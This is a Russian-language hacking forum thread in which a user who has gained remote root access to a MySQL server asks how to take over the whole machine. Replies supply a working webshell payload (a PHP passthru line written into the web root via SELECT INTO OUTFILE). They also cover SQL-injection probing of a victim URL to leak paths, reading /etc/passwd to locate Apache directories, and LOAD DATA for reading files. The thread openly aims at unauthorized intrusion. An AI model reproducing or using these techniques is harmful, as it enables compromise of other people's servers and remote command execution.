Зашёл удолёно на MySql под root. Подскажите как захватить сервак.

Я думал скрипт залить но как я потом его вызову ?
Думал может в таблицы какието файлы по заливать а потом почитать их но как
заливать данные из таблиц
Помогите пожалуйста.

 

CREATE TABLE `shell` (s TEXT);
INSERT INTO `shell` values ('<? passthru("$cmd"); ?>');
SELECT `s` INTO OUTFILE '/svoi/puti/k/saity/shell.php' FROM `shell`;
DROP TABLE `shell`;

 

ето ты конечно ловко придумал:
SELECT `s` INTO OUTFILE '/svoi/puti/k/saity/shell.php' FROM `shell`;

только вот как узнать полные пути к катологам в которых разрешено выполнение скриптов?

 

Попробуй на самом серваке скрипты пощупать. Может удача улыбнёться и ты увидишь северный путь :d

 

У меян короче такой же косяк. Я короче путь знаю всё когда прописываю выдаёт следующее "You have an error in your SQL syntax. Check the manual that corresponds to your MySQL server version for the right syntax to use near '; INSERT INTO `shell` values (''); SEL". Я в скулях особо не разбираюсь но скажите мне что за ошибка?

 

victim.ru/check.php=into
Это просто глупый пример,попробуй вместо into подставить ' ,если будет ошибка узнаешь часть серв. пути.
victim.ru/check.php='

 

INSERT INTO `shell` values ('<? passthru("$cmd"); ?>');
замени на
INSERT INTO `s` values ('<? passthru("$cmd"); ?>');

 

А разницы? лучше не стало такая же ошибка. Использую скрипт от rst.

 

2 SanyaX
версия твоего мускуля не поддерживает выполнение нескольких sql запросов через ; вот и все... насколько я понимаю

 

ну можно например из /etc/passwd узнать путь к апачу. оттуда по всем извесным относительным путям conf/httpd.conf узнаешь путь к директории со скриптами. санякс пока ни одна версия мускля не обрабатывает запрос после ; по-крайней мере пхп библиотека для работы с мускл сервером за один mysql_query этого не позволяет.

 

Уважаемий ZaCo
Разьясните пожалуйста мне как из /etc/passwd узнать путь к апачу.

 

Да и ещё вопросик, я слышал что в таблицы(MySql) Даные можно заливать из файлов.

Подскажите как?

 

Кажется я нашёл ответы на свои вопросы.
http://www.rst.void.ru/forum/viewtopic.php?t=2437

 

Но может у когото будут дополнения.
Буду рад услышать.

 

в етк\пассвд хранятся пути к каталогам пользователей системы. дабы повысить безопасность каждому домону лучше выдавать свою ограниченную учетную запись. апач же обычно так и запускают, поэтому в большенстве случаев можно определить путь к каталогу апача.

 

Там есть домашняя директория юзера apach но наивно палагать что тебе можно читать httpd.conf
посмотри лучше в /etc/named.conf сопоставь с данными из /etc/passwd если есть чтото общее то заливай шел и через сайт ломись

http://www.mysql.ru/docs/man/LOAD_DATA.html

Удачи !

 

Всем большое спасибо!

при попытке читать /etc/named.conf пишет Can't get stat
А вот /etc/passwd читает!!!!!
Ну буду копать теперь есть материлы к размышлению!!!

Кстате я хотел узнать на счет ответсвенности за действия подобного рода........
может поделитесь опытом????

 

locate httpd.conf
find / -name httpd.conf


Enjoy....